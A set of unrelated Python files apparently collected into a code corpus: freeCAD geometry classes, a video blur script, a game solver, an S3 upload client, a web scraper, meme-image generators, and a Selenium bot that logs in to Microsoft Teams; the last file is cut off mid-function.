            The name of the 2D/3D freeCAD object that this is built from. If the
            3D part's label equals a unique freeCAD label, None may be passed
            as a shortcut.
        thickness : float
            The wire thickness.
        z0 : float
            The starting z coordinate.
            (Default value = 0.0)
        virtual : bool
            Whether the part is virtual or not.
            (Default value = False)
        """
        super().__init__(label, fc_name, virtual=virtual)
        self.thickness = thickness
        self.z0 = z0
class WireShellPart(Geo3DPart):
    def __init__(
        self,
        label: str,
        fc_name: str,
        thickness: float,
        target_wire: WirePart,
        shell_verts: List[int],
        depo_mode: str,
        virtual: bool = False,
    ):
        """Class for the geometry of a wire shell.

        Parameters
        ----------
        label : str
            The descriptive name of this new part.
        fc_name : str
            The name of the 2D/3D freeCAD object that this is built from. Note that if the
            label used for the 3D part is the same as the freeCAD label, and that label is
            unique, None may be used here as a shortcut.
        thickness : float
            The shell thickness.
        target_wire : WirePart
            Target wire for coating.
        shell_verts : List[int]
            Vertices to use when rendering the coating.
        depo_mode : str
            'depo' or 'etch' defines the positive or negative mask.
        virtual : bool
            Whether the part is virtual or not.
            (Default value = False)

        Raises
        ------
        ValueError
            If depo_mode is not one of the valid modes.
        """
        valid_depo_modes = ["depo", "etch"]
        # CONSISTENCY FIX: validate against the named list instead of a
        # duplicated literal so the check and the message cannot drift apart.
        if depo_mode not in valid_depo_modes:
            raise ValueError(
                f"{depo_mode} is not a valid depo mode. Options are {valid_depo_modes}"
            )
        self.thickness = thickness
        self.target_wire = target_wire
        self.shell_verts = shell_verts
        self.depo_mode = depo_mode
        super().__init__(label, fc_name, virtual=virtual)
class SAGPart(Geo3DPart):
    def __init__(
        self,
        label: str,
        fc_name: str,
        thickness: float,
        z_middle: float,
        t_in: float,
        t_out: float,
        z0: float = 0.0,
        virtual: bool = False,
    ):
        """A selective-area-growth (SAG) part.

        Parameters
        ----------
        label : str
            The descriptive name of this new part.
        fc_name : str
            The name of the 2D/3D freeCAD object that this is built from. If the
            3D part's label equals a unique freeCAD label, None may be passed
            as a shortcut.
        thickness : float
            The total SAG thickness.
        z_middle : float
            The location for the "flare out".
        t_in : float
            The lateral distance from the 2D profile to the edge of the top bevel.
        t_out : float
            The lateral distance from the 2D profile to the furthest "flare out"
            location.
        z0 : float
            The starting z coordinate.
            (Default value = 0.0)
        virtual : bool
            Whether the part is virtual or not.
            (Default value = False)
        """
        super().__init__(label, fc_name, virtual=virtual)
        self.thickness = thickness
        self.z0 = z0
        self.z_middle = z_middle
        self.t_in = t_in
        self.t_out = t_out
class LithographyPart(Geo3DPart):
    def __init__(
        self,
        label: str,
        fc_name: str,
        thickness: float,
        layer_num: int,
        z0: float = 0.0,
        litho_base: Optional[List[str]] = None,
        virtual: bool = False,
    ):
        """Class for lithography.

        Parameters
        ----------
        label : str
            The descriptive name of this new part.
        fc_name : str
            The name of the 2D/3D freeCAD object that this is built from. Note that if the
            label used for the 3D part is the same as the freeCAD label, and that label is
            unique, None may be used here as a shortcut.
        thickness : float
            The lithography thickness.
        layer_num : int
            The layer number. Lower numbers go down first, with higher numbers deposited
            last.
        z0 : float
            The starting z coordinate.
            (Default value = 0.0)
        litho_base : List[str]
            The base partNames to use. For multi-step lithography, the bases are just all
            merged, so there is no need to list this more than once.
            (Default value = empty list)
        virtual : bool
            Whether the part is virtual or not.
            (Default value = False)
        """
        self.thickness = thickness
        self.z0 = z0
        self.layer_num = layer_num
        # BUG FIX: `litho_base=[]` was a shared mutable default — every
        # instance constructed without an explicit list aliased (and could
        # mutate) the same list object. Use None as the sentinel and allocate
        # a fresh list per instance; callers are unaffected.
        self.litho_base = [] if litho_base is None else litho_base
        super().__init__(label, fc_name, virtual=virtual)
|
from difuminado import convertir
import cv2
# Split a video into frames, run each frame through `convertir` (blur), and
# write both the raw and the processed frame to disk.
capture = cv2.VideoCapture('./Videos/cholula_puebla_street_cloudy_afternoon_27082021_1757.mp4')
cont = 0
path = 'Videos/out/Temp_'
outputPath = ''
Path_ = 'Videos/outPut/'
outputPath_ = ''
while capture.isOpened():
    ret, frame = capture.read()
    # Stop as soon as a frame cannot be read (end of stream or error);
    # the original compared `ret == True` — plain truthiness is the idiom.
    if not ret:
        break
    outputPath = path + 'IMG_%04d.jpg' % cont
    outputPath_ = Path_ + 'IMG_%04d.jpg' % cont
    cv2.imwrite(outputPath, frame)
    img = convertir(outputPath, cont)
    cv2.imwrite(outputPath_, img)
    cont += 1
    # Allow early exit with the 's' key.
    if cv2.waitKey(1) == ord('s'):
        break
capture.release()
cv2.destroyAllWindows()
# Canonical single-letter codes for game-position values.
DWULT = {
    'DRAW': 'D',
    'WIN': 'W',
    'UNDECIDED': 'U',
    'LOSS': 'L',
    'TIE': 'T'
}


def solve(primitive, do_move, gen_moves, initial_position):
    """Solve a two-player game by memoized backward induction.

    Parameters
    ----------
    primitive : callable(pos) -> str
        Returns a DWULT code; 'U' (UNDECIDED) means the position is not terminal.
    do_move : callable(pos, move) -> pos
        Applies a move to a position.
    gen_moves : callable(pos) -> iterable
        Yields the legal moves from a position.
    initial_position : callable() -> pos
        Produces the starting position (positions must be hashable).

    Returns the DWULT value of the initial position. Ties and draws are not
    handled yet — non-terminal positions resolve to WIN or LOSS only.
    """
    memo = {}

    def solve_position(cur_pos):
        # Memoization: each position is evaluated at most once.
        if cur_pos in memo:
            return memo[cur_pos]
        result = primitive(cur_pos)
        if result == DWULT['UNDECIDED']:
            # A position is a WIN iff some move leads to a LOSS for the
            # opponent. any() short-circuits on the first losing child
            # instead of materializing and solving every successor.
            has_losing_child = any(
                solve_position(do_move(cur_pos, move)) == DWULT['LOSS']
                for move in gen_moves(cur_pos)
            )
            result = DWULT['WIN'] if has_losing_child else DWULT['LOSS']
        memo[cur_pos] = result
        return result

    return solve_position(initial_position())
|
"""Interactions with CosmosID's and S3's APIs regarding file uploads to S3."""
import logging
import os
import sys
import types
import boto3
import requests
from boto3.exceptions import S3UploadFailedError
from boto3.s3.transfer import TransferConfig
from botocore.exceptions import ClientError
from s3transfer.manager import TransferManager
from s3transfer.subscribers import BaseSubscriber
from s3transfer.utils import OSUtils, ReadFileChunk
from cosmosid.api import urls
from cosmosid.api.files import Files
from cosmosid.helpers.exceptions import (
AuthenticationFailed,
NotEnoughCredits,
NotFoundException,
UploadException,
)
from cosmosid.utils import LOCK, do_not_retry_event, requests_retry_session, retry
LOGGER = logging.getLogger(__name__)
# Size units in bytes.
KB = 1024
MB = 1024 * KB
GB = 1024 * MB
# Files larger than this are uploaded via S3 multipart upload.
MULTIPART_THRESHOLD = 1 * GB
MAX_CHUNK_SIZE = 5 * GB
# NOTE(review): smaller cap on Windows — presumably to stay under a 2 GB
# per-part limit in that environment; confirm.
if sys.platform.startswith("win"):
    MAX_CHUNK_SIZE = 1.9 * GB
MIN_CHUNK_SIZE = 1 * GB
# Maximum number of concurrent transfer threads.
MAX_CONCURRENCY = 5
class OSUtilsWithCallbacks(OSUtils):
    """Abstraction for manipulations on file[-like] objects.

    Overrides the s3transfer OSUtils chunk-reader factories so that the
    returned ReadFileChunk objects are created with callbacks enabled.
    """

    def open_file_chunk_reader(self, filename, start_byte, size, callbacks):
        # Build a chunk reader from a path, with progress callbacks enabled.
        return ReadFileChunk.from_filename(
            filename, start_byte, size, callbacks, enable_callbacks=True
        )

    def open_file_chunk_reader_from_fileobj(
        self, fileobj, chunk_size, full_file_size, callbacks, close_callbacks=None
    ):
        # Build a chunk reader from an open file object, callbacks enabled.
        return ReadFileChunk(
            fileobj,
            chunk_size,
            full_file_size,
            callbacks=callbacks,
            enable_callbacks=True,
            close_callbacks=close_callbacks,
        )
class ProgressSubscriber(BaseSubscriber):
    """Progress subscriber for any number of upload threads."""

    def __init__(self, filename):
        self._filename = filename
        # Total file size in bytes (float for the percentage arithmetic).
        self._size = float(os.path.getsize(filename))
        # Bytes transferred so far, accumulated across all threads.
        self._seen_so_far = 0
        # Module-level shared lock guards the counter across threads.
        self._lock = LOCK

    def on_progress(self, future, bytes_transferred, **kwargs):
        """Callback to be invoked when progress is made on transfer."""
        with self._lock:
            self._seen_so_far += bytes_transferred
            percentage = (self._seen_so_far / self._size) * 100
            # Rewrite the same console line (\r) with MB progress and percent.
            sys.stdout.write(
                "\r%s %sMB / %sMB (%.2f%%)"
                % (
                    self._filename,
                    int(self._seen_so_far / MB),
                    int(self._size / MB),
                    percentage,
                )
            )
            sys.stdout.flush()
def create_client(base_url, api_key):
    """Create boto3 s3 client.

    Adds methods to the client for CosmosID's and S3's upload/download
    operations.
    """
    client = boto3.client("s3")
    # Stash the API coordinates on the client for the patched methods below.
    client.base_url = base_url
    client.header = {"X-Api-Key": api_key}
    # Endpoints (per the urls constants): BFILE = big/multipart, SFILE = small.
    client.burl = client.base_url + urls.UPLOAD_BFILE_URL
    client.surl = client.base_url + urls.UPLOAD_SFILE_URL
    # Re-bind the module-level functions as bound methods, replacing the
    # client's S3 operations with the CosmosID-API-backed implementations.
    client.create_multipart_upload = types.MethodType(create_multipart_upload, client)
    client.abort_multipart_upload = types.MethodType(abort_multipart_upload, client)
    client.upload_part = types.MethodType(upload_part, client)
    client.put_object = types.MethodType(put_object, client)
    client.complete_multipart_upload = types.MethodType(
        complete_multipart_upload, client
    )
    return client
@retry(logger=LOGGER, tries=2)
def create_multipart_upload(self, *args, **kwargs):
    """Requests to CosmosID's API to initiate the multipart upload.

    Returns the decoded JSON response on HTTP 200; otherwise an empty dict.
    """
    data = dict(kwargs)
    mp_up = requests.put(self.burl, json=data, headers=self.header, timeout=10)
    resp = dict()
    if mp_up.status_code == requests.codes.ok:
        resp = mp_up.json()
    return resp
@retry(logger=LOGGER, tries=3)
def abort_multipart_upload(self, *args, **kwargs):
    """Requests to CosmosID's API to do the cleanup.

    Amazon S3 retains all the parts until you either complete or abort the
    upload. Throughout its lifetime, you are billed for all storage,
    bandwidth, and requests for this multipart upload and its associated parts.
    """
    data = dict(kwargs)
    ab_mp = requests.delete(self.burl, json=data, headers=self.header, timeout=5)
    # requests.Response is falsy for 4xx/5xx status codes.
    if not ab_mp:
        # BUG FIX: the original `raise Exception` carried no message at all,
        # making retries/logging useless for diagnosis. Keep the type (callers
        # may catch Exception broadly) but include the failing status code.
        raise Exception(
            "abort_multipart_upload failed with status %s" % ab_mp.status_code
        )
    return ab_mp.json()
@retry(logger=LOGGER, tries=3)
def upload_part(self, *args, **kwargs):
    """Uploads data part to S3.

    Requests pre-signed URL from CosmosID's API. Uses it to upload data
    to S3. Returns the S3 response headers as a dict; raises on failure.
    """
    data = dict(kwargs)
    resp = None
    # The part body must not be serialized into the pre-signed-URL request.
    upload_body = data.pop("Body")
    url_ = requests.get(self.burl, json=data, headers=self.header, timeout=5)
    if url_.status_code == requests.codes.ok:
        # PUT the raw bytes directly to the pre-signed S3 URL.
        resp = requests.put(url_.json(), upload_body)
        if resp.headers:
            return dict(resp.headers)
    raise Exception("Upload issues.")
@retry(logger=LOGGER, tries=3)
def put_object(self, *args, **kwargs):
    """Upload small file.

    Requests pre-signed URL from CosmosID's API. Uses it to upload file
    to S3. Returns the S3 response headers as a dict; raises on failure."""
    data = dict(kwargs)
    # The file body must not be serialized into the pre-signed-URL request.
    upload_body = data.pop("Body")
    resp = None
    # NOTE(review): unlike upload_part, this GET sets no timeout — confirm
    # whether one should be added for consistency.
    url_ = requests.get(self.surl, json=data, headers=self.header)
    if url_.status_code == requests.codes.ok:
        # PUT the raw bytes directly to the pre-signed S3 URL.
        resp = requests.put(url_.json(), upload_body)
        if resp.headers:
            return dict(resp.headers)
    raise Exception("Upload issues.")
@retry(logger=LOGGER, tries=3)
def complete_multipart_upload(self, *args, **kwargs):
    """Complete multipart upload.

    Makes requests to CosmosID's API in order to complete a multipart
    upload by assembling previously uploaded parts. It's been mentioned
    somewhere in the docs that consequent complete_multipart_uploads are OK
    for a short period after the upload is successfully completed.
    """
    data = dict(kwargs)
    cmp_up = requests.post(self.burl, json=data, headers=self.header, timeout=60)
    # requests.Response is truthy only for non-error status codes.
    if cmp_up:
        return cmp_up.json()
    raise Exception("complete_multipart_upload did not succeed.")
def upload_file(**kwargs):
    """Upload manager.

    Keyword Args:
        file: path of the file to upload.
        parent_id: optional id of the destination folder.
        base_url: CosmosID API base URL.
        api_key: API key used for authentication.

    Returns the S3 upload key on success, or None if interrupted.
    Raises NotEnoughCredits, AuthenticationFailed, NotFoundException,
    UploadException or S3UploadFailedError on failure.
    """
    filename = kwargs.get("file")
    parent_id = kwargs.get("parent_id", None)
    base_url = kwargs.get("base_url")
    api_key = kwargs.get("api_key")
    multipart_chunksize = file_size = os.stat(filename)[6]  # get size of file in bytes
    client = create_client(base_url=base_url, api_key=api_key)
    if file_size > MULTIPART_THRESHOLD:  # bigger that 1GB
        # Aim for roughly 10 parts, clamped to [MIN_CHUNK_SIZE, MAX_CHUNK_SIZE].
        multipart_chunksize = min(int(file_size / 10), int(MAX_CHUNK_SIZE))
        multipart_chunksize = max(multipart_chunksize, int(MIN_CHUNK_SIZE))
        LOGGER.info("File size: %s MB", file_size / MB)
        LOGGER.info("Chunk size: %s MB", int(multipart_chunksize / MB))
    config = TransferConfig(
        multipart_threshold=MULTIPART_THRESHOLD,
        max_concurrency=MAX_CONCURRENCY,
        multipart_chunksize=multipart_chunksize,
    )
    osutil = OSUtilsWithCallbacks()
    # Check if given parent folder exists
    if parent_id:
        fl_obj = Files(base_url=base_url, api_key=api_key)
        res = fl_obj.get_list(parent_id=parent_id, limit=1)
        if not res["status"]:
            raise NotFoundException("Parent folder for upload does " "not exists.")
    transfer_manager = TransferManager(client, config=config, osutil=osutil)
    subscribers = [
        ProgressSubscriber(filename),
    ]
    _, file_name = os.path.split(filename)
    try:
        # Ask the API to initialise the upload and hand back S3 coordinates.
        init_url = client.base_url + urls.UPLOAD_INIT_URL
        response = requests_retry_session().put(
            init_url, json=dict(file_name=file_name), headers=client.header
        )
        if response.status_code == 402:
            raise NotEnoughCredits("Insufficient credits for upload.")
        if response.status_code == 403:
            raise AuthenticationFailed("Authentication Failed. Wrong API Key.")
        if response.status_code == requests.codes.ok:
            sources = response.json()
            # Kick off the (possibly multipart) transfer asynchronously.
            future = transfer_manager.upload(
                filename,
                sources["upload_source"],
                sources["upload_key"],
                extra_args=None,
                subscribers=subscribers,
            )
        else:
            LOGGER.error(
                "File upload inititalisation Failed. " "Response code: %s",
                response.status_code,
            )
            raise UploadException(
                "File upload inititalisation Failed. "
                "Response code: %s" % response.status_code
            )
        try:
            # Block until the transfer finishes.
            future.result()
        except KeyboardInterrupt:
            # On Ctrl-C, tell the retry helpers to stop and bail out quietly.
            do_not_retry_event.set()
            return
        return sources["upload_key"]
    # If a client error was raised, add the backwards compatibility layer
    # that raises a S3UploadFailedError. These specific errors were only
    # ever thrown for upload_parts but now can be thrown for any related
    # client error.
    except ClientError as error:
        raise S3UploadFailedError(
            f'Failed to upload (unknown) to {"/".join([sources["upload_source"], sources["upload_key"]])}: {error}'
        ) from error
def upload_and_save(files, parent_id, file_type, base_url, api_key):
    """
    Upload list of files and save them
    :param files: list of dicts where each file is:
        {
            'files': list of file paths,
            'sample_name': name of sample,
            'ext': files extension
        }
    :param parent_id: id of parent folder
    :param file_type: type of analysis (shotgun, amplicon, ...)
    :param base_url: base url of api
    :param api_key: api key of current user
    :return: decoded JSON of the sample-creation response on success,
        False when credits, authentication or upload fail
    """
    client = create_client(base_url=base_url, api_key=api_key)
    try:
        # Upload every file first, collecting the returned S3 upload keys.
        items = []
        for file_name in files["files"]:
            items.append(
                upload_file(
                    file=file_name,
                    file_type=file_type,
                    parent_id=parent_id,
                    api_key=api_key,
                    base_url=base_url,
                )
            )
        # Register the uploaded items as a single sample via the API.
        data = dict(
            source=dict(type="web-upload", items=items),
            sample_name=files["sample_name"],
            folder_id=parent_id,
            file_type=file_type,
        )
        create_file_url = client.base_url + urls.SAMPLES_URL
        create_response = requests_retry_session().post(
            create_file_url, json=data, headers=client.header
        )
        if create_response.status_code == 200:
            return create_response.json()
        else:
            raise UploadException("Failed to upload files: %s" % data["sample_name"])
    except NotEnoughCredits:
        LOGGER.error("Not Enough Credits")
        return False
    except AuthenticationFailed:
        LOGGER.error("Authentication Failed")
        return False
    except UploadException:
        LOGGER.error("File Upload Failed.")
        return False
def pricing(data, base_url, api_key):
    """Fetch the pricing quote for the given samples payload from the API."""
    client = create_client(base_url=base_url, api_key=api_key)
    pricing_url = client.base_url + urls.SAMPLES_PRICING_URL
    response = requests_retry_session().post(
        url=pricing_url, json={"data": data}, headers=client.header
    )
    # Success: decode and return the JSON body.
    if response.status_code == 200:
        return response.json()
    # Error statuses (4xx/5xx) surface as exceptions; other non-200
    # statuses fall through (returning None), as before.
    response.raise_for_status()
|
#coding:utf-8
# NOTE: Python 2 script (urllib2, reload(sys), bare print statements).
# Scrapes procurement notices from ggzy.njzwfw.gov.cn and prints the
# "design" (设计) entries.
import urllib2
from bs4 import BeautifulSoup
import re
import sys
reload(sys)
# Force utf-8 as the default codec so str/unicode mixing does not raise.
sys.setdefaultencoding('utf8')
# Listing pages 1..4 of the notice category.
urls = []
for i in range(4):
    url = "http://ggzy.njzwfw.gov.cn/njweb/fjsz/068001/068001001/" + str(i+1) + ".html"
    urls.append(url)
urlroot = "http://ggzy.njzwfw.gov.cn"
# Browser-like headers; presumably the site rejects the default urllib2
# User-Agent — TODO confirm.
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36",
    "Referer": "http://ggzy.njzwfw.gov.cn/njweb/fjsz/buildService1.html"
}
for u in urls:
    req = urllib2.Request(u, headers=headers)
    res = urllib2.urlopen(req).read()
    soup = BeautifulSoup(res, 'lxml')
    div_articles = soup.find_all("li", class_="ewb-info-item2")
    for i in div_articles:
        result = i.find_all('div')
        # NOTE: `type` shadows the builtin; holds the notice category title.
        type = result[2].find('p')['title']
        if type == u"设计":
            title = result[1].find('p')['title']
            price = result[3].find('p').text
            time = result[4].find('p').text
            # The detail URL is embedded in an onclick handler; pull the
            # first single-quoted string out of it.
            link = i['onclick']
            p = re.compile(r'\'(.+?)\'')
            link_s = urlroot + p.findall(link)[0]
            print title
            print type
            print price
            print time
            print link_s
            print "================="
|
import asyncio
from PIL import Image, ImageDraw, ImageFont
from datetime import date
async def stick_maker_static_traitor(
        text: str, image_file: Image.Image, font_path: str, image_wight: int, image_height: int) -> Image.Image:
    """
    "There is a mole" (有内鬼) meme template.

    Renders *text* onto the template, wrapped into lines of at most ~415 px,
    plus a rotated "<len>/100" character counter.

    :param text: caption text
    :param image_file: template image pasted as the base layer
    :param font_path: path to a TrueType font
    :param image_wight: output width in px (original spelling kept)
    :param image_height: output height in px
    :return: composed meme image
    """
    def __handle() -> Image.Image:
        # Background layer
        background = Image.new(mode="RGB", size=(image_wight, image_height), color=(255, 255, 255))
        # Text layer: character counter ("<n>/100")
        text_num_img = Image.new(mode="RGBA", size=(image_wight, image_height), color=(0, 0, 0, 0))
        font_num_size = 48
        font_num = ImageFont.truetype(font_path, font_num_size)
        ImageDraw.Draw(text_num_img).text(xy=(0, 0), text=f'{len(text)}/100', font=font_num, fill=(255, 255, 255))
        # Text layer: main caption
        text_main_img = Image.new(mode="RGBA", size=(image_wight, image_height), color=(0, 0, 0, 0))
        font_main_size = 54
        font_main = ImageFont.truetype(font_path, font_main_size)
        # Wrap the caption into lines no wider than 415 px.
        # BUG FIX: the original appended the entire remaining text on every
        # iteration where the current line was still short enough (the else
        # branch ran inside the loop), duplicating the caption many times.
        # The remainder must be appended exactly once, after the loop.
        spl_num = 0
        spl_list = []
        for num in range(len(text)):
            if font_main.getsize_multiline(text[spl_num:num])[0] >= 415:
                spl_list.append(text[spl_num:num])
                spl_num = num
        spl_list.append(text[spl_num:])
        test_main_fin = ''
        for item in spl_list:
            test_main_fin += item + '\n'
        ImageDraw.Draw(text_main_img).multiline_text(xy=(0, 0), text=test_main_fin, font=font_main, spacing=8,
                                                     fill=(0, 0, 0))
        # Rotate the text layers to match the template's perspective
        text_num_img = text_num_img.rotate(angle=-9, expand=True, resample=Image.BICUBIC, center=(0, 0))
        text_main_img = text_main_img.rotate(angle=-9.5, expand=True, resample=Image.BICUBIC, center=(0, 0))
        # Compose: template first, then the rotated text layers
        background.paste(im=image_file, box=(0, 0))
        background.paste(im=text_num_img, box=(435, 140), mask=text_num_img)
        background.paste(im=text_main_img, box=(130, 160), mask=text_main_img)
        return background
    # PIL work is blocking; run it in the default executor.
    loop = asyncio.get_running_loop()
    result = await loop.run_in_executor(None, __handle)
    return result
async def stick_maker_static_jichou(
        text: str, image_file: Image.Image, font_path: str, image_wight: int, image_height: int) -> Image.Image:
    """
    "Holding a grudge" (记仇) meme template.

    Builds the caption "today is <date><text>, I'm writing this grudge down",
    wraps it to the image width, and draws it centred below the template.

    :param text: grudge text inserted into the caption
    :param image_file: template image pasted at the top
    :param font_path: path to a TrueType font
    :param image_wight: output width in px (original spelling kept)
    :param image_height: template height in px (canvas grows below it)
    :return: composed meme image
    """
    def __handle() -> Image.Image:
        # Caption body (runtime string kept verbatim)
        text_ = f"今天是{date.today().strftime('%Y年%m月%d日')}{text}, 这个仇我先记下了"
        font_main_size = 42
        font_main = ImageFont.truetype(font_path, font_main_size)
        # Wrap into lines no wider than 7/8 of the image width.
        # BUG FIX: the original appended the whole remaining text on every
        # iteration where the line was still short enough; the remainder is
        # now appended exactly once, after the loop.
        spl_num = 0
        spl_list = []
        for num in range(len(text_)):
            if font_main.getsize_multiline(text_[spl_num:num])[0] >= (image_wight * 7 // 8):
                spl_list.append(text_[spl_num:num])
                spl_num = num
        spl_list.append(text_[spl_num:])
        text_main_fin = '\n'.join(spl_list)
        font = ImageFont.truetype(font_path, font_main_size)
        text_w, text_h = font.getsize_multiline(text_main_fin)
        # Extend the canvas below the template to make room for the caption
        background_w = image_wight
        background_h = image_height + text_h + 20
        background = Image.new(mode="RGB", size=(background_w, background_h), color=(255, 255, 255))
        # Template goes flush at the top
        image_coordinate = (0, 0)
        background.paste(image_file, image_coordinate)
        draw = ImageDraw.Draw(background)
        # Horizontally centre the caption under the image
        text_coordinate = (((background_w - text_w) // 2), image_height + 5)
        draw.multiline_text(text_coordinate, text_main_fin, font=font, fill=(0, 0, 0))
        return background
    # PIL work is blocking; run it in the default executor.
    loop = asyncio.get_running_loop()
    result = await loop.run_in_executor(None, __handle)
    return result
async def stick_maker_static_phlogo(
        text: str, image_file: Image.Image, font_path: str, image_wight: int, image_height: int) -> Image.Image:
    """
    PH-style logo meme template.

    Splits *text* on the first whitespace: the first word is drawn white on
    black, the rest black on a rounded yellow box, side by side on a black
    background.

    NOTE(review): single-word input makes test_sentences[1] raise IndexError
    — confirm callers always pass at least two words. image_file /
    image_wight / image_height are unused here — presumably kept for
    signature parity with the other templates; verify.
    """
    def __handle() -> Image.Image:
        # Split the caption into the white part (first word) and yellow part (rest)
        test_sentences = text.strip().split(maxsplit=1)
        white_text = test_sentences[0]
        yellow_text = test_sentences[1]
        font_size = 640
        font = ImageFont.truetype(font_path, font_size)
        text_w, text_h = font.getsize(text)
        y_text_w, y_text_h = font.getsize(yellow_text)
        # Yellow box with the second part of the caption centred in it
        bg_y_text = Image.new(mode="RGB", size=(round(y_text_w * 1.1), round(text_h * 1.3)), color=(254, 154, 0))
        draw_y_text = ImageDraw.Draw(bg_y_text)
        draw_y_text.text((round(y_text_w * 1.1) // 2, round(text_h * 1.3) // 2),
                         yellow_text, anchor='mm', font=font, fill=(0, 0, 0))
        radii = 64
        # Draw a circle (later split into 4 quarters for the rounded corners)
        circle = Image.new('L', (radii * 2, radii * 2), 0)  # black square
        draw_circle = ImageDraw.Draw(circle)
        draw_circle.ellipse((0, 0, radii * 2, radii * 2), fill=255)  # white circle inscribed in the black square
        # Convert to RGBA so the corner mask (alpha) can be applied
        bg_y_text = bg_y_text.convert("RGBA")
        y_weight, y_height = bg_y_text.size
        # Paste the 4 quarter-circles into the corners of a white mask
        alpha = Image.new('L', bg_y_text.size, 255)  # white rectangle, same size as the yellow box
        alpha.paste(circle.crop((0, 0, radii, radii)), (0, 0))  # top-left corner
        alpha.paste(circle.crop((radii, 0, radii * 2, radii)), (y_weight - radii, 0))  # top-right corner
        alpha.paste(circle.crop((radii, radii, radii * 2, radii * 2)), (y_weight - radii, y_height - radii))  # bottom-right corner
        alpha.paste(circle.crop((0, radii, radii, radii * 2)), (0, y_height - radii))  # bottom-left corner
        bg_y_text.putalpha(alpha)  # white mask area stays visible, black becomes transparent
        # Black box with the first word drawn in white
        w_text_w, w_text_h = font.getsize(white_text)
        bg_w_text = Image.new(mode="RGB", size=(round(w_text_w * 1.05), round(text_h * 1.3)), color=(0, 0, 0))
        w_weight, w_height = bg_w_text.size
        draw_w_text = ImageDraw.Draw(bg_w_text)
        draw_w_text.text((round(w_text_w * 1.025) // 2, round(text_h * 1.3) // 2),
                         white_text, anchor='mm', font=font, fill=(255, 255, 255))
        # Join both boxes side by side, then centre them on a black background
        text_bg = Image.new(mode="RGB", size=(w_weight + y_weight, y_height), color=(0, 0, 0))
        text_bg.paste(bg_w_text, (0, 0))
        text_bg.paste(bg_y_text, (round(w_text_w * 1.05), 0), mask=alpha)
        t_weight, t_height = text_bg.size
        background = Image.new(mode="RGB", size=(round(t_weight * 1.2), round(t_height * 1.75)), color=(0, 0, 0))
        b_weight, b_height = background.size
        background.paste(text_bg, ((b_weight - t_weight) // 2, (b_height - t_height) // 2))
        return background
    # PIL work is blocking; run it in the default executor.
    loop = asyncio.get_running_loop()
    result = await loop.run_in_executor(None, __handle)
    return result
# Public names exported by `from <module> import *`.
__all__ = [
    'stick_maker_static_traitor',
    'stick_maker_static_jichou',
    'stick_maker_static_phlogo'
]
|
from time import sleep
from selenium.webdriver.common.keys import Keys
from .Team import Team
from .Meeting import Meeting
from ..common.settings import config
from ..common import functions as fn
class User:
    """Defines a Microsoft Teams user.
    Attributes:
        email (str): stores email of the user
        password (str): stores password of the user
    """
    def __init__(self, email: str, password: str, teams: list[Team]=None):
        # NOTE(review): the annotation should arguably be Optional[list[Team]]
        # since None is the default; left unchanged to keep the signature.
        self.email = email
        self.password = password
        self._teams = teams
    def __repr__(self):
        # NOTE(review): exposes the plaintext password — confirm repr()
        # output never reaches logs.
        return (
            f"{self.email}\n"
            f"{self.password}\n"
            f"{self.teams}"
        )
    @property
    def teams(self) -> list[Team]:
        """:obj:`list` of :obj:`Team`: the teams the user is on"""
        return self._teams
    @teams.setter
    def teams(self, value):
        self._teams = value
    @staticmethod
    def get_teams() -> list[Team]:
        """Scrape the team tree from the Teams web UI and build Team objects."""
        selector = "ul>li[role='treeitem']>div[sv-element]"
        teams = fn.browser.find_elements_by_css_selector(selector)
        # data-tid looks like "...team-<name>-li"; slice out the <name> part.
        names = [team.get_attribute("data-tid") for team in teams]
        names = [name[name.find('team-') + 5:name.rfind("-li")] for name in names]
        headers = [team.find_element_by_css_selector("h3") for team in teams]
        ids = [header.get_attribute("id") for header in headers]
        return [Team(names[i], ids[i]) for i in range(len(teams))]
class Bot(User):
    """Simulates behaviour of a Microsoft Teams user.
    Attributes:
        email (str): stores email of the user
        password (str): stores password of the user
    """
    def __init__(self, email, password):
        super().__init__(email, password)
    def start(self):
        """Sign in, discover teams, and join the first meeting found."""
        self.sign_in()
        # Give the Teams web app time to finish loading after login.
        sleep(15)
        self.teams = self.get_teams()
        if meetings := self.get_meetings(self.teams):
            for team in self.teams:
                if team.name == config["TEAM"]:
                    for channel in team.channels:
                        if channel.has_meeting:
                            print("> Captain, looks like I've found our lecture!")
                            # NOTE(review): always joins meetings[0], no matter
                            # which team/channel matched — confirm intended.
                            self.connect(meetings[0])
        else:
            print("> I didn't find any meeting.")
    def sign_in(self) -> None:
        """Sign in to the Microsoft Teams"""
        # Find a login form
        email_class = fn.query_selector("input[type='email']", 30)
        if email_class:
            email_class.send_keys(self.email)
        # Avoid StaleElementReferenceException
        email_class = fn.query_selector("input[type='email']", 5)
        if email_class:
            email_class.send_keys(Keys.ENTER)
        login_class = fn.query_selector("input[type='password']", 10)
        if login_class:
            login_class.send_keys(self.password)
        # Avoid StaleElementReferenceException
        login_class = fn.query_selector("input[type='password']", 5)
        if login_class:
            login_class.send_keys(Keys.ENTER)
        # Accept all proposals to keep logged in and use
        # browser instead of app to log in MS Teams finally.
        keep_logged_in = fn.query_selector("input[id='idBtn_Back']", 5)
        if keep_logged_in:
            keep_logged_in.click()
        use_web_instead = fn.query_selector(".use-app-lnk", 5)
        if use_web_instead:
            use_web_instead.click()
    @staticmethod
    def go_to_calendar():
        """Open the Calendar tab from the left app bar (no-op if not found)."""
        calendar_selector = "button.app-bar-link > ng-include > svg.icons-calendar"
        calendar = fn.query_selector(calendar_selector, 5)
        calendar.click() if calendar else None
    @staticmethod
    def go_to_teams():
        """Open the Teams tab from the left app bar (no-op if not found)."""
        teams_selector = "button.app-bar-link > ng-include > svg.icons-teams"
        teams = fn.query_selector(teams_selector, 5)
        teams.click() if teams else None
    def get_meetings(self, teams=None):
        """Collect Meeting objects from every channel flagged has_meeting.

        :param teams: list of Team objects; defaults to self.teams
        :return: list of Meeting objects (possibly empty)
        """
        if teams is None:
            teams = self.teams
        meetings = []
        conversations = "https://teams.microsoft.com/_#/conversations/a"
        for team in teams:
            for channel in team.channels:
                if channel.has_meeting:
                    # Navigate straight to the channel by URL, then re-open
                    # the Teams tab so the thread renders.
                    script = f'window.location = "{conversations}a?threadId={channel.id_}&ctx=channel";'
                    fn.browser.execute_script(script)
                    self.go_to_teams()
                    meeting_element = fn.query_selector(".ts-calling-thread-header", 10)
                    if meeting_element is None:
                        continue
                    meeting_elements = fn.browser.find_elements_by_css_selector(".ts-calling-thread-header")
                    for meeting_element in meeting_elements:
